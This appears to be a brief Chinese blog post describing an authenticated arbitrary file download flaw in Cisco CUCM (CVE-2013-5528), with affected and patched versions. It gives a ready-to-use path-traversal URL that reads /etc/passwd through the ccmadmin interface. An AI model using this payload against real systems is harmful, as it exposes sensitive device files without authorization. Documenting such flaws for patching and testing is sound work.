AD

Cisco_CUCM任意文件下载_(CVE-2013-5528)

   cisco CUCM的管理接口存在任意文件下载,通过认证后,访问如下目录格式,即可访问设备的敏感文件。

http://justpentest.com/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd


影响范围:
 version of 7.x, 8.x or 9.x

已经修补: 9.1.2, 10.5.2 and 11.5.x.

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce